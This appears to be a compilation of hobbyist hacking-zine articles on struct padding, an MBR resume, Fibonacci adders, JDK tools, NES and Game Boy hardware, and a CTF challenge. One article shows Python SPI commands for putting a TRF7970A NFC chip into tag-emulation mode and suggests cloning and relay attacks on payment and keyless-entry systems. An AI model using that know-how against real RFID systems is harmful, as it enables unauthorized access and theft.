Currently, the size of the structure is 12 bytes. In this case, a 3-byte gap was created between "a" and "c". The structure itself also has a 3-byte hole/padding at its end. This is useful if we have an array of structure objects, so all of them start on aligned addresses.

If you need a particular structure layout, for example to fit a given protocol, you can use Structure-Packing Pragmas⁵ to change the alignment. For instance, the following code sets the alignment to one byte⁶:


#pragma pack(1) 


If we place this code before declaring the second 
structure, it will be packed into the following form: 


(gdb) ptype /o struct A
/* offset    |  size */  type = struct A {
/*    0      |     1 */    char a;
/*    1      |     4 */    int c;
/*    5      |     1 */    char b;

                           /* total size (bytes):    6 */
                         }


Now, without alignment the size is exactly what we 
expected at the beginning. ;) 


To sum up, yes, the order of variable declarations is 
relevant. 


4. SIMD (Single Instruction, Multiple Data) is an instruction set which allows you to execute the same operation on multiple data at the same time.

5. See: https://gcc.gnu.org/onlinedocs/gcc-9.1.0/gcc/Structure-Layout-Pragmas.html

6. The directive applies to all later struct declarations. You can return to the previous settings using #pragma pack().


Bootcard 


tsurai <tsurai@tsunix.de> 


I always loved the weird and obscure side of hacking. 
Thinking outside of the box and creating something that 
was never meant to be and might not even make any 
sense to other people. 

Enter Bootcard, a bootable mini-resume in 16-bit real 
mode assembler code that fits in the master boot record 
and can be printed on a business card encoded as a QR 
code. 


1 Real mode and the master boot record 


All x86 compatible CPUs begin execution of the boot sector code in "real mode". Real mode is a very limited 16-bit legacy operating mode that, among other things, can only directly address about 1 MB of memory and defaults to 16-bit operands. But it also has one advantage over the 32-bit protected and 64-bit long modes by being able to easily access BIOS functions, which is the easiest way to print our text to the screen.

One might think that the BIOS is well behaved and 
specified. Sadly, that is far from reality. Never rely on 
anything and double check everything. 

The second part of our execution environment is the 
master boot record. The classical MBR is a 512 byte 
large area consisting of a 446 byte boot code area, 64 
byte partition table and 2 byte magic signature. Usually 
the code would have to fit into the boot code area, but 
we can use the partition table as well since we have no 
use for it. 


2 Implementation 


The assembly code does not have to do a lot and is rather simple. All we need are functions to first clear the screen from previous BIOS output, and then to print our own data. Luckily the Video BIOS already has those, accessible via the interrupt 0x10 video display functions.¹

You might be wondering where the actual resume text 
is coming from. It is kept in a file separate from the 
code for better readability and to avoid unnecessary 
recompilation. A plain ASCII encoded text file that is 
being translated into a 32-bit ELF relocatable object via 
objcopy and linked into the .rodata section of the final 
binary. 

But wait, now our text is a readable part of our binary. 
What if someone inspects the image before booting it 
and already sees the content. That’s no fun! So we 
are going to “hide” it by applying a simple XOR cipher. 
That is not really going to fool anyone of course, but at 
least it hides the data from plain sight. 

Finally, the linker script is putting it all together and 
adds the 0x55AA bootsector signature bytes at the offset 
Ox1FE of the binary to construct a valid master boot 
record the BIOS can find and boot. 


¹ http://www.ctyme.com/intr/int-10.htm
.section .text
.code16
    ljmp $0x0000, $start                   # canonicalize %cs:%ip
start:
    mov $0x0002, %ax
    int $0x10                              # set 80x25 text mode
    mov $0x0700, %ax
    mov $0x0f, %bh
    mov $0x184F, %dx
    xor %cx, %cx
    int $0x10                              # clear screen
    xor %bx, %bx
    xor %dx, %dx
    mov $0x02, %ah
    int $0x10                              # reset cursor pos
    mov $0x0e, %ah
    mov $_binary_src_data_txt_start, %si
.print:                                    # print loop (mnemonics restored from the operand listing)
    cmp $_binary_src_data_txt_end, %si
    je .done
    lodsb                                  # next byte of the resume text
    xor $0x42, %al                         # undo the XOR "cipher"
    int $0x10                              # print character
    jmp .print
.done:
    jmp .done


i386-elf-as -o build/boot.o src/boot.S
i386-elf-objcopy -I binary -B i386 -O elf32-i386 \
    --rename-section .data=.rodata \
    src/data.txt build/data.o
i386-elf-ld -T src/boot.ld --oformat binary \
    -o boot.img build/boot.o build/data.o


With our final binary in hand, all we need to figure out is how to distribute it. Some sort of compression has to be applied to decrease the size of the code and of the QR code that is being generated from it. Gzip is an obvious candidate, but the resulting compressed archive might be too vague for the reader to be recognized as such.

A clever solution has been shown by Alok Menghrajani, who managed to put a bootable game into a single tweet by using base64 encoding and Perl's character repetition feature². The gap between our data and the boot sector signature, which is filled with NUL bytes, gets translated into a series of 'A's, enabling easy compression.


3 Conclusion 


That is pretty much it. Generate a QR code, put it somewhere, and see how many ppl will actually boot it. The odds are poor, but it sure was fun to make.


² https://www.quaxio.com/bootable_cd_retro_game_tweet/


Designing adder circuit for Fibonacci representation 


Tomasz Idziaszek 
algonotes.com/en/fibonacci-arithmetic 


Fibonacci numbers are defined as follows:

$F_0 = 0$, $F_1 = 1$, $F_i = F_{i-1} + F_{i-2}$ for $i \geq 2$,

thus forming an infinite sequence 0, 1, 1, 2, 3, 5, 8, 13, ... Any natural number can be represented as a sum of distinct Fibonacci numbers, e.g. $7 = 5 + 2 = F_5 + F_3$. Edouard Zeckendorf noticed that as long as we don't use adjacent numbers, this representation is unique. Thus a binary string $a_{k-1} \ldots a_1 a_0$ of length $k$ in which there are no adjacent 1s uniquely represents the number

$a_{k-1} \cdot F_{k+1} + \ldots + a_1 \cdot F_3 + a_0 \cdot F_2$.

There are $F_{k+2}$ such strings and they represent numbers from 0 to $F_{k+2} - 1$.

We could imagine a computer that stores integers in this representation (think that it would improve the sturdiness of punch cards, should such a computer use them: no adjacent 1s means no adjacent holes). That leads to a question: how to perform basic arithmetic operations? Let's start with incrementation by one. To increment $a_{k-1} \ldots a_1 a_0$ and obtain $c_k c_{k-1} \ldots c_1 c_0$, where $c_k$ is the carry (overflow) flag, it suffices to do the transformation $a_1 a_0 \to c_1 c_0$ on the last two bits:

$00 \to 01$,  $01 \to 10$,  $10 \to 11$

and leave the remaining bits unchanged.

Unfortunately, this could lead to a pair of adjacent 1s. We can remove it by applying the transformation $011 \to 100$ from right to left to subsequent triplets of bits. On the image below there is a circuit fix that performs such a transformation and a 5-bit incrementer using it:


[Figure: the fix circuit performing $011 \to 100$ on a triplet of bits ($a_2 a_1 a_0$), and a 5-bit incrementer built from a chain of fix blocks: inputs $a_4 a_3 a_2 a_1 a_0$, outputs $c_5 c_4 c_3 c_2 c_1 c_0$.]


Addition of two integers $a_{k-1} \ldots a_1 a_0$ and $b_{k-1} \ldots b_1 b_0$ is more complicated. After we add them position-wise, we could end up with adjacent 1s or even some 2s (but only surrounded by 0s from both sides).

First we try to remove 2s (ignoring adjacent 1s). We do it from left to right, making sure that we do not introduce any new 2s to the left, but we can introduce some new 2s to the right (and even some 3s, as well as some 2s or 3s adjacent to 1s, that must be removed in subsequent steps). After playing for a while with the transformations needed, we could obtain the following list:

$020x \to 100\bar{x}$,  $021x \to 110x$,
$030x \to 110\bar{x}$,  $012x \to 101x$.

Here $x$ denotes any digit from $\{0, 1, 2\}$ and $\bar{x} = x + 1$.


algonotes.com 


In a single step, we need to apply one of these transformations to a group of four double-bits, which come from adding $a_i + b_i$. We represent such a double-bit as a two-bit integer $A_i B_i$, thus first we apply a half adder $h$ to them (see image below).

The circuit fib-adder that selects the appropriate transformation is a little bit complicated. Note that the leftmost double-bit is always in $\{0, 1\}$, since we already removed 2s from that part, so we don't need $A_3$.


[Figure: the half adder $h$ producing the double-bit $A_i B_i$ from $a_i + b_i$, and the fib-adder circuit that takes four double-bits ($B_3$, $A_2 B_2$, $A_1 B_1$, $A_0 B_0$) and outputs the transformed double-bits.]


To construct a multidigit adder we must take care of border cases (at both sides of the string). On the left we just add a bogus 0. On the right we introduce bogus $F_1$ and $F_0$. The latter has value 0, so the obtained coefficient can be ignored, but the former has to be examined. After all this we get a string containing only 0s and 1s, but there could be arbitrarily long strides of adjacent 1s, as well as a bogus $c_{-1} = 1$.

To fix it, we apply a sweep of the transformation $011 \to 100$ twice. First from left to right, which is equivalent to making the following transformations for $y \in \{0, 1\}$:

$y\,0\,1^{2k}\,0 \to y\,(10)^k\,00$,  $y\,0\,1^{2k+1}\,0 \to y\,(10)^k\,010$


After that, groups of adjacent 1s have length at most two. We can remove them by making another sweep from right to left. Also $c_0$ and $c_{-1}$ cannot be simultaneously equal to 1, so we can just OR them. On the image below there is an adder producing $c_{k+1} c_k \ldots c_1 c_0$ for $k = 5$:

[Figure: the 5-bit adder built from half adders, fib-adder blocks and three rows of fix sweeps; inputs $b_4 \ldots b_0$ and $a_4 \ldots a_0$, outputs $c_6 c_5 c_4 c_3 c_2 c_1 c_0$.]
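The same transformations in software, as an added C++ example (mine, not the article's circuits): the incrementer is exactly the last-two-bits rewrite followed by one right-to-left $011 \to 100$ sweep; the adder adds position-wise and then repeats the $2F_j = F_{j+1} + F_{j-2}$ rule (the $020x \to 100\bar{x}$ family) and $011 \to 100$ until the string is normal, instead of the circuit's fixed number of passes. The bogus $F_1$/$F_0$ slots and the digit-vector layout are my own conventions.

```cpp
// Added example, not the article's circuits: the same transformations applied in software.
// Digits are stored least-significant first, d[p] multiplying F_{p+2}, so {1, 0, 1}
// is the string "101" = F_4 + F_2 = 3 + 1 = 4.
#include <algorithm>
#include <cstdint>
#include <vector>

using Digits = std::vector<int>;

std::uint64_t fib(std::size_t n) {                     // F_0 = 0, F_1 = 1, F_2 = 1, ...
    std::uint64_t a = 0, b = 1;
    while (n--) { std::uint64_t t = a + b; a = b; b = t; }
    return a;
}

std::uint64_t zeck_value(const Digits& d) {            // value of any digit string
    std::uint64_t v = 0;
    for (std::size_t p = 0; p < d.size(); ++p) v += d[p] * fib(p + 2);
    return v;
}

bool zeck_valid(const Digits& d) {                     // only 0/1 and no adjacent 1s
    for (std::size_t p = 0; p < d.size(); ++p) {
        if (d[p] != 0 && d[p] != 1) return false;
        if (p + 1 < d.size() && d[p] == 1 && d[p + 1] == 1) return false;
    }
    return true;
}

Digits trimmed(Digits d) {                             // drop leading zeros, keep one digit
    while (d.size() > 1 && d.back() == 0) d.pop_back();
    return d;
}

Digits zeck_encode(std::uint64_t n) {                  // greedy: largest Fibonacci number first
    std::size_t k = 2;
    while (fib(k + 1) <= n) ++k;                       // F_k is the largest F <= n
    Digits d(k - 1, 0);
    for (; k >= 2; --k) if (fib(k) <= n) { d[k - 2] = 1; n -= fib(k); }
    return d;
}

// Incrementer as in the article: rewrite the last two bits (00->01, 01->10, 10->11),
// then one right-to-left sweep of 011 -> 100 clears the adjacent 1s this may create.
Digits zeck_increment(Digits d) {
    d.push_back(0);                                     // room for the carry c_k
    if (d.size() < 2) d.push_back(0);
    if (d[1] == 0 && d[0] == 0) d[0] = 1;               // 00 -> 01
    else if (d[1] == 0) { d[0] = 0; d[1] = 1; }         // 01 -> 10
    else d[0] = 1;                                      // 10 -> 11 (11 never occurs)
    for (std::size_t p = 0; p + 1 < d.size(); ++p)
        if (d[p] == 1 && d[p + 1] == 1) {               // 011 -> 100, moving leftwards
            d[p] = d[p + 1] = 0;
            if (p + 2 == d.size()) d.push_back(0);
            d[p + 2] = 1;
        }
    return trimmed(d);
}

// Adder: add position-wise (digits 0..2), then apply 2 F_j = F_{j+1} + F_{j-2} (the
// 020x -> 100x̄ family) and 011 -> 100 until nothing changes. The circuit does this in a
// fixed number of passes; here the rules are simply repeated until the string is normal.
Digits zeck_add(const Digits& a, const Digits& b) {
    // w[j] carries weight F_j; w[1] and w[0] are the bogus F_1 and F_0 slots on the right.
    std::vector<int> w(std::max(a.size(), b.size()) + 4, 0);
    for (std::size_t p = 0; p < a.size(); ++p) w[p + 2] += a[p];
    for (std::size_t p = 0; p < b.size(); ++p) w[p + 2] += b[p];
    for (bool changed = true; changed;) {
        changed = false;
        for (std::size_t j = w.size(); j-- > 2;)         // remove 2s, left to right
            while (w[j] >= 2) {
                w[j] -= 2; changed = true;
                if (j + 1 == w.size()) w.push_back(0);
                w[j + 1] += 1; w[j - 2] += 1;
            }
        while (w[1] >= 2) { w[1] -= 2; w[3] += 1; changed = true; }   // 2 F_1 = F_3
        if (w[1] == 1) { w[1] = 0; w[2] += 1; changed = true; }       // F_1 = F_2: fold c_{-1} into c_0
        w[0] = 0;                                                     // F_0 is worth nothing
        for (std::size_t j = 2; j + 1 < w.size(); ++j)                // 011 -> 100 sweep
            if (w[j] == 1 && w[j + 1] == 1) {
                w[j] = w[j + 1] = 0; changed = true;
                if (j + 2 == w.size()) w.push_back(0);
                w[j + 2] += 1;
            }
    }
    return trimmed(Digits(w.begin() + 2, w.end()));
}

// Cross-check both operations against the numeric value for all small operands.
bool exhaustive_check(std::uint64_t limit) {
    for (std::uint64_t n = 0; n < limit; ++n)
        if (zeck_increment(zeck_encode(n)) != zeck_encode(n + 1)) return false;
    for (std::uint64_t x = 0; x < limit; ++x)
        for (std::uint64_t y = 0; y < limit; ++y) {
            Digits s = zeck_add(zeck_encode(x), zeck_encode(y));
            if (!zeck_valid(s) || zeck_value(s) != x + y || s != zeck_encode(x + y)) return false;
        }
    return true;
}
```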


A box of tools to spy on Java. 


OpenJDK has been improving its tools lately and provides us with some powerful spying tools - all of them 
come with man pages, if in doubt take a look there! Some might require the newest JDK - 11. 


jps - launched without any flags it will simply list all Java processes and their pids, but there are some useful flags you might want to include, such as -v (lists arguments passed to the JVM), -m (lists arguments passed to the main method) or -l (shows package names).


jstack - prints all Java thread stack traces with useful information, such as what state the thread is in and what code it's currently executing. Very useful for identifying deadlocks, livelocks and similar. The states a Java thread can be in include (among others) BLOCKED (thread is waiting for entry to a critical section), WAITING (thread blocked from code - Object.wait()), TIMED_WAITING (Object.wait() with a timeout argument). There is much more useful information, such as daemon_prio (priority inside the JVM), os_prio (priority in the OS), tid (id of the thread), nid (id of the thread in the OS), address on heap. Especially nid might come in useful to use some more advanced OS tools to learn more about the thread.


jmap - this tool will give you a look into the heap. It can do a heapdump on JDK below version 11, since JDK 
11 you should do that with jcmd (note that dumping the heap causes a “stop the world” event so don’t do 
that on critical processes). Some useful flags include -clstats (display stats for each class), -histo (for 
histogram) and -finalizerinfo (to view classes which are gathered by Garbage Collector but their 
finalize() methods have not been called yet) 


jstat - samples a running JVM for selected metrics. Useful to quickly identify easy-to-spot issues but won’t 
help with more ephemeral ones. Some useful flags include -gcutil (for stats on GC) and 
-printcompilation (displays the last successful JIT compilation). 


jcmd - introduced in JDK 7, this tool is the swiss army knife of JVM diagnostic tools - it sends a command to a running JVM to accomplish most of what other tools allow for and more. Launched without any commands it acts as jps. Use jcmd <pid> help to view what commands are available for a given process (as they might differ depending on what JVM version the process is running on).


jhsdb (Java HotSpot debugger) is your go-to tool for post-mortem analysis, introduced in JDK 9. If you provide it with a core dump file and a path to the JVM that was used to launch the process, it will let you launch most of the aforementioned tools on a dead process. Usage: jhsdb jstack|jmap|jinfo --core <path-to-core-dump> --exe <path-to-JVM>. It can also be used to debug a living process. Remember you need to enable core dumps first (with ulimit).


java -Xlog gives access to Unified Logging of JVM messages. Using tags, logging levels, decorators and selectors it gives you a lot of customization options on what to log. For example, java -Xlog:gc+heap will give you all the messages that have both the gc and heap tags. Some of the useful things you might want to inspect using this tool are: safepoints with java -Xlog:safepoint (safepoints in the JVM are stop-the-world events where all the threads stop in well-defined spots in order to allow the JVM to perform some house cleaning, often used by GC), Thread Local Allocation Buffers with -Xlog:tlab, JIT with -Xlog:jit+inlining, compilation+jit, etc. For more information about the usage, use java -Xlog:help.


Java Flight Recorder, previously a commercial tool from Oracle, is part of OpenJDK since Java 11. It has very little overhead and needs to be enabled when starting a java process with java -XX:+FlightRecorder -XX:StartFlightRecording=duration=60s,filename=xxx - it dumps a binary file that needs to be viewed with Java Mission Control (which is a separate tool, not part of the JDK).


Radosław Skupnik https://rskupnik.github.io/
Community Advertisement


TRF7970A
forgotten features


for HydraNFC 


The TRF7970A is a powerful multi-protocol transceiver IC (Integrated Circuit) included in the HydraNFC module, that most of its owners only use to sniff data exchanged by a 13.56 MHz NFC/RFID tag and a reader with tools provided in the HydraBUS firmware. But the specifications¹ show many more abilities than people are actually aware of, as this transceiver can be fully controlled at low level by an MCU (Microcontroller Unit). Moreover, the makers and developers of HydraNFC/HydraBUS have documented features to read and to emulate some types of tags using the provided interface of HydraBUS, and by digging in their documentation, we can find some examples and commands to use the default raw mode of this little IC². This mode unleashes awesome possibilities to weaponize 13.56 MHz RFID attacks for specific intrusions, or to support various types of cards and readers.


To use it, a series of steps have to be performed 
through HydraBUS serial interface: 


• configure GPIOs for SPI (PA2, PA3, PC0, PC1, and PB11);

• enter bitbang mode;

• switch into SPI mode and configure SPI frequency, polarity and phase, and then the SPI2 speed that should be close to the specified DATA CLOCK at 2 MHz as in the TRF7970A datasheet;

• turn on RF and then check if the TRF7970A is alive.


A Python script bbio_hydranfc_init.py³ automates that process in the HydraFW repository. Moreover, a project called pynfcreader⁴ has been released to talk at low level to some NFC cards by using the HydraNFC. These two contributions are very helpful to understand how to control the transceiver through the SPI interface.


Above all, we should at least be aware of the ISO Control Register (0x01, 8 bits long), as described in the transceiver datasheet (table 5-5)⁵, to work for example as an NFC reader → *0x01=0x88 (active mode, no CRC), or emulator → *0x01=0xA4 (active mode, card emulator mode and used protocol).


¹ http://www.ti.com/product/TRF7970A
² https://github.com/hydrabus/hydrafw/wiki/HydraFW-HydraNFC-v1.x-TRF7970A-Tutorial




But we should also be aware of other registers like the Modulator and SYS_CLK Control register (0x09) that sets the type of modulation and data speed (defined in table 6-1), as well as the Chip Status Control register (0x00) to set the transceiver mode, like the interesting Direct Mode 0 (Raw RF Sub-Carrier Data Stream) to encode/decode the whole 13.56 MHz subcarrier data stream, which is perfect when reading non-ISO standard compliant tags for example.


The following Python 2 code illustrates preliminary steps to set the transceiver in emulation mode:

# from bbio_hydranfc_init.py
configure_trf797a_gpio()
enter_bbio()
bbio_spi_conf()
bbio_trf7970a_init()

## END

def sendspi(data, res_len=0x0):
    cs_on()
    # write 'n' data, read data
    ser.write("\x05\x00" + chr(len(data)) + chr(res_len))
    status = ser.read(1)  # read status
    cmd_check_status(status)
    cs_off()

sendspi(”\x83”) # power on reset 

# 13.56 MHz SYS_CLK, OOK (100%) Mod type 

sendspi(”\x09\x31”) 

sendspi(”\x01\xa4”) # set emulator mode 

sendspi(”\x41”, 0x1) 

sendspi(”\x00\x21”) # turn RF active 

# 5V operation 

# [other control register here] 

# [machine state to respond] 


Sources of implemented emulators like hydranfc_emul_mifare.c could inspire us to implement a tag compatible with targeted systems. Of course, a lot of work and tests would have to be performed when setting all control registers as well as the state machine to talk to the reader. Moreover, in lots of cases when the reader is strict with the timing of responses, it is better to implement all the emulation in the MCU part.


The TRF7970A, as integrated in the HydraNFC, is already a powerful tool to sniff data, but all of its capabilities are still underused, while it could be a cheaper alternative to the Proxmark3 in many cases. In addition to emulation, cloning and tag reading (even non-ISO standard), the TRF7970A can also be used for relay attacks such as those unburied recently for payment systems⁶, and other systems like passive keyless entry and start systems⁷, that do not have a strict timing restraint.


To finish, it is recommended to read the datasheet 
of this awesome transceiver that is full of surprises and 
could help to create interesting tools when testing or 
attacking RFID/NFC systems. 


[3] https://github.com/hydrabus/hydrafw/blob/master/contrib/bbio_hydranfc/bbio_hydranfc_init.py
[4] https://github.com/gvinet/pynfcreader
[5] https://datasheet.octopart.com/TRF7970ARHBR-Texas-Instruments-datasheet-15828043.pdf
[6] https://salmg.net/[...]/intro-to-nfc-payment-relay-attacks/
[7] http://s3.eurecom.fr/docs/ndss11_francillon.pdf

https://twitter.com/FlUxIuS


Sébastien Dudek (@FlUxIuS)


SAA-ALL 0.0.5 


Build your own controller for NES! 


Build your own controller for Pegasus (NES clone)!


The article covers the communication protocol between the controller and the console, and a PoC implementation of a simple controller built using an ATmega8A.

Pegasus features two DB9 male ports on the front of the console to support swappable controllers. A simplified pinout of the port can be seen in the corresponding diagram.

Legend (pins as listed in the diagram):

- N/C
- DATA (in)
- STROBE (out)
- CLOCK (out)
- N/C
- +5V (out)
- N/C
- GND (out)
- N/C

Inputs and outputs are described with regard to the console. Obviously, the female plug of the controller needs to be mirrored.

+5V and GND are power lines. The console acts as a master, shifting out bits on DATA, where "0" implies a button press. Each bit gets acknowledged by a tick on CLOCK. Before the start of transmission, a signal on STROBE is sent to update the shift register with the current state of the buttons. A transmission example can be seen in the corresponding diagram.

[Diagram: transmission example with the STROBE, CLOCK and DATA waveforms]

Bits on DATA denote the following buttons, consecutively: A, B, Select, Start, Up, Down, Left and Right. In the diagram the A button is pressed, every other button is released.

Timing of the signals is not defined per se, but you can use the following as reference:

- positive STROBE impulse width - 4.5 us,
- time distance between positive edges of consecutive STROBE impulses - 20 ms (50 Hz, compare with the frame rate of PAL),
- negative CLOCK impulse width - 0.58 us,
- time distance between negative edges of consecutive CLOCK impulses - 15.79 us,
- response delay - 120 ns.

Response delay is the time after which DATA sets its state according to STROBE or CLOCK changes. The state of DATA may change on a positive edge of STROBE or CLOCK.

In order to implement the protocol above we could buy a chip with a built-in shift register and interface it to an MCU, but it would be no fun. Let's try to use our MCU to the fullest.

The naive approach to the challenge would utilize GPIO bit-banging. There is a major issue with this idea as the required timing is strict. CPU stress would be high enough to stop us from doing tasks such as USB handling.

The protocol described previously is akin to SPI. We can use this fact to utilize the SPI HW block in slave mode. MISO can be used as DATA. Similarly, SCK can be used as CLOCK. An SPI slave needs to have SS asserted for all the time the transmission takes place. We can use STROBE to generate the proper SS signal on a GPIO pin. To be sure we do it fast enough, we connect STROBE to INT0 (PD2) and handle the proper ISR. As the aforementioned GPIO we'll use PB1 by strapping it to SS (PB2).

Crucial excerpts from the PoC implementation can be seen below. Implementation of the GPIO macros is left as an exercise for the reader.

#include <avr/io.h>
#include <avr/interrupt.h>
#include <util/delay.h>

static uint8_t shift_data = 0xff;   /* byte presented to the console, 0 = pressed */
static void shift_init(void);

int main(int argc, char *argv[])
{
    shift_init();
    // input with a pull-up
    gpio_cfg_inp(BUTTON);
    sei();
    while (1)
    {
        // handle GPIO buttons
        if (0 == gpio_get(BUTTON))
        {
            shift_data = (uint8_t) ~_BV(BTN_A);
            _delay_ms(200);
            shift_data = 0xff;
        }
    }
    return 0;
}

ISR(INT0_vect)
{
    // on the rising edge of STROBE: pulse SS to reset the SPI slave, then load the byte
    gpio_set(FORCE_SS);
    SPDR = shift_data;
    gpio_clr(FORCE_SS);
}

ISR(SPI_STC_vect)
{
    /* restore SS to high after transaction */
    gpio_set(FORCE_SS);
}

static void shift_init(void)
{
    gpio_cfg_inz(STROBE);     // hi-Z input, PD2
    gpio_cfg_out(FORCE_SS);   // output, PB1
    /* note that PB1 is strapped to SS (PB2) */
    MCUCR |= _BV(ISC01) | _BV(ISC00);   // INT0 on rising edge
    GICR |= _BV(INT0);
    gpio_cfg_out(DATA);       // MISO, PB4
    SPCR |= _BV(SPE) | _BV(CPOL) | _BV(SPIE);   // SPI slave, clock idles high, interrupt on
}

Szymon Morawski
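The exchange described above (STROBE latches the buttons, one bit per CLOCK on DATA, 0 = pressed), as an added software model that is not the article's firmware. It assumes the A button is the first bit shifted out and sits in bit 7 of the latched byte, which is what loading ~_BV(BTN_A) into SPDR with MSB-first SPI implies if BTN_A is 7; the article's reference timings are only used to build a constructed trace.

```python
"""Software model of the Pegasus/NES controller exchange (added example)."""

BUTTONS = ["A", "B", "Select", "Start", "Up", "Down", "Left", "Right"]  # order on DATA
REF_US = {"strobe": 4.5, "clock_low": 0.58, "clock_period": 15.79}      # from the article


def encode_frame(pressed):
    """Byte a firmware would load into SPDR: bit 7 = A ... bit 0 = Right, 0 = pressed."""
    value = 0xFF
    for idx, name in enumerate(BUTTONS):
        if name in pressed:
            value &= ~(0x80 >> idx) & 0xFF
    return value


def decode_frame(bits):
    """8 sampled DATA bits (A first) -> list of pressed button names."""
    return [name for name, bit in zip(BUTTONS, bits) if bit == 0]


class Controller:
    """Controller side: a parallel-in/serial-out shift register."""

    def __init__(self, pressed=()):
        self.pressed = set(pressed)
        self.reg = 0xFF                         # idle: everything released

    def strobe(self):                           # positive edge of STROBE latches the buttons
        self.reg = encode_frame(self.pressed)

    def data(self):                             # level on DATA: the current MSB
        return (self.reg >> 7) & 1

    def clock(self):                            # positive edge of CLOCK: shift, feed 1s in
        self.reg = ((self.reg << 1) | 1) & 0xFF


def make_trace(pressed, t0=0.0):
    """Constructed logic-analyser trace of one poll: (t_us, STROBE, CLOCK, DATA) per edge."""
    ctrl = Controller(pressed)
    t = t0
    trace = [(t, 0, 1, ctrl.data())]            # idle: STROBE low, CLOCK high
    ctrl.strobe()
    trace.append((t, 1, 1, ctrl.data()))        # STROBE rises: A's bit appears on DATA
    t += REF_US["strobe"]
    trace.append((t, 0, 1, ctrl.data()))        # STROBE falls
    for _ in range(8):
        t += REF_US["clock_period"] - REF_US["clock_low"]
        trace.append((t, 0, 0, ctrl.data()))    # CLOCK falls: the console samples DATA here
        t += REF_US["clock_low"]
        ctrl.clock()
        trace.append((t, 0, 1, ctrl.data()))    # CLOCK rises: next button's bit shifted out
    return trace


def decode_trace(trace):
    """Console/analyser side: open a frame on a STROBE rising edge, sample DATA on each
    CLOCK falling edge, decode after 8 bits. Returns one button list per frame."""
    frames, bits, in_frame = [], [], False
    prev_strobe, prev_clock = trace[0][1], trace[0][2]
    for _, strobe, clock, data in trace[1:]:
        if strobe and not prev_strobe:
            bits, in_frame = [], True
        elif in_frame and prev_clock and not clock:
            bits.append(data)
            if len(bits) == 8:
                frames.append(decode_frame(bits))
                in_frame = False
        prev_strobe, prev_clock = strobe, clock
    return frames


if __name__ == "__main__":
    # two polls 20 ms apart, as the STROBE period in the article suggests
    trace = make_trace({"A"}) + make_trace({"Start", "Right"}, t0=20000.0)
    print(decode_trace(trace))                  # [['A'], ['Start', 'Right']]
```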


Wobble the Nintendo logo on the Game Boy


by Felipe Alfonso - bitnenfer 


This is a very simple but fun effect that can be 
achieved in just a couple of lines of assembly. This 
effect is done using the same Nintendo logo that is 
left on VRAM by the boot rom. In our program we 
change the horizontal and vertical scroll for each 
scan line of the LCD using a lookup table. For this, 
we only need a toolchain that outputs instructions 
for the Sharp LR35902 CPU. RGBDS 
(https://rednex.github.io/rgbds/) will be our 
weapon of choice. It includes an assembler, linker 
and rom header fixer. 


section "HEADER", ROM0[$0100]
    nop
    jp wobble_main
    ; Nintendo logo, checked by the boot ROM
    db $CE,$ED,$66,$66,$CC,$0D,$00,$0B
    db $03,$73,$00,$83,$00,$0C,$00,$0D
    db $00,$08,$11,$1F,$88,$89,$00,$0E
    db $DC,$CC,$6E,$E6,$DD,$DD,$D9,$99
    db $BB,$BB,$67,$63,$6E,$0E,$EC,$CC
    db $DD,$DC,$99,$9F,$BB,$B9,$33,$3E
    db "WOBBLE", $00
; Entry point
section "WOBBLE", ROM0[$0150]
wobble_main:
    ld e,$00            ; frame counter, shifts the table every frame
    ld h,$20            ; high byte of the lookup table address ($2000)
wobble_loop:
    ld b,$00            ; scan line we are waiting for
.inner_loop:
    ldh a,[$44]         ; LY: current scan line
    cp b
    jr nz,.inner_loop
    ld a,b
    inc b
    add a,e
    and $1F             ; index wraps inside the 32-entry table
    ld l,a
    ld a,[hl]
    ldh [$43],a         ; SCX: horizontal scroll for this line
    ld a,l
    add a,$09
    and $1F
    ld l,a
    ld a,[hl]
    ldh [$42],a         ; SCY: vertical scroll for this line
    ldh a,[$44]
    cp $90              ; line 144: entering VBlank, frame done
    jr nz,.inner_loop
    inc e
    jr wobble_loop

section "WOBBLE_DATA", ROM0[$2000]
    db $00,$00,$01,$01,$02,$02,$02,$02
    db $02,$02,$02,$02,$01,$01,$00,$00
    db $00,$00,$FF,$FF,$FE,$FE,$FE,$FE
    db $FE,$FE,$FE,$FE,$FF,$FF,$00,$00

twitter.com/bitnenfer


For compiling this with RGBDS we use the following commands:

rgbasm -o wobble.o wobble.asm
rgblink -o wobble.gb wobble.o
rgbfix -v -p0 wobble.gb

Now that the ROM is built we can run it on the BGB emulator or a physical system. Sadly it won't work with a Game Boy Color because that system clears the logo from VRAM after booting up.


Felipe Alfonso 
HOW TO: unboringly tease Google CTF 2019


Reverse Engineering 




HOW NOT TO: introduce into python 


1 Introduction 


Last year's Google CTF Beginners Quest [1] did not introduce reverse engineering very well. Unfortunately there were only two RE challenges and just one of them, called GATEKEEPER [2], had the potential to get you in touch with a disassembler. Most video write-ups I have seen [3][4][5] did not take a look at the assembly or the algorithm itself, because it was not necessary and they caught the password almost immediately. What a pity! How could this be, and does it give a good introduction into the topic of reverse engineering?


2 Problem 


Because the encoded password was stored within the binary, you got your attack vector. In my opinion, the chosen password was way too trivial, and so the reversed leetspeak phrase "zLllks_d4m_t0g_I" kind of alerted everybody. Not real reversing but literally simple reversing was involved to get to the flag. There was a big unused potential within this task. It was small and commonly compiled code, easy to reverse in order to understand the algorithm instead of guessing the right answer. I thought hard about how to use this good potential and gave it a try by patching it.


[1] https://github.com/google/google-ctf/tree/master/2018/beginners
[2] https://github.com/google/google-ctf/blob/master/2018/beginners/re-gatekeeper/attachments/gatekeeper
[3] https://www.youtube.com/watch?v=bshuAGkgY3M
[4] https://www.youtube.com/watch?v=qDYwclf0LZw
[5] https://www.youtube.com/watch?v=WUOMnLWKFre
3 Solution


I just tinkered a little bit inside the binary, closed 
the backdoor and let you peek into crucial changes 
being made. You should be unable to simply reverse 
the patch. I think it is still easy but hopefully not as 
quickly solvable as last time. Perhaps you will learn 
at least something new from the modified challenge. 


4 Task 


The home owners put another cake in the fridge, not 
before fixing some issues and patching the software. 
Thanks to our surveillance team, we just intercepted 
some parts of the current patch. 


#!/us..bin/..thon

f = open('gatekeeper', 'r+b')
f.s.ek(0xde0)
f.wr..e(b'S..Wh..e')
f.seek(0xe01)
f..rite(b's..cr..E..1k..rc')
..see..0xb29)
f.write.b.\x..')


Good luck and lots of fun using your preferred disassembler to reverse some x86 [6] opcodes. Experienced players must not use the given link and should instead disassemble the binary stored in olly's magical backup patterns. With pen and paper only, of course! ;P Solutions you could mailto:idandre@hotmail.de. Do you feel like playing more CTFs? Let's meet June 22 at Google CTF 2019 [7]!


[6] https://github.com/idandre/gatekeeper-2.git
[7] https://g.co/ctf
HOW TO: easily get started with radare2




HOW NOT TO: learn x86 assembly language 


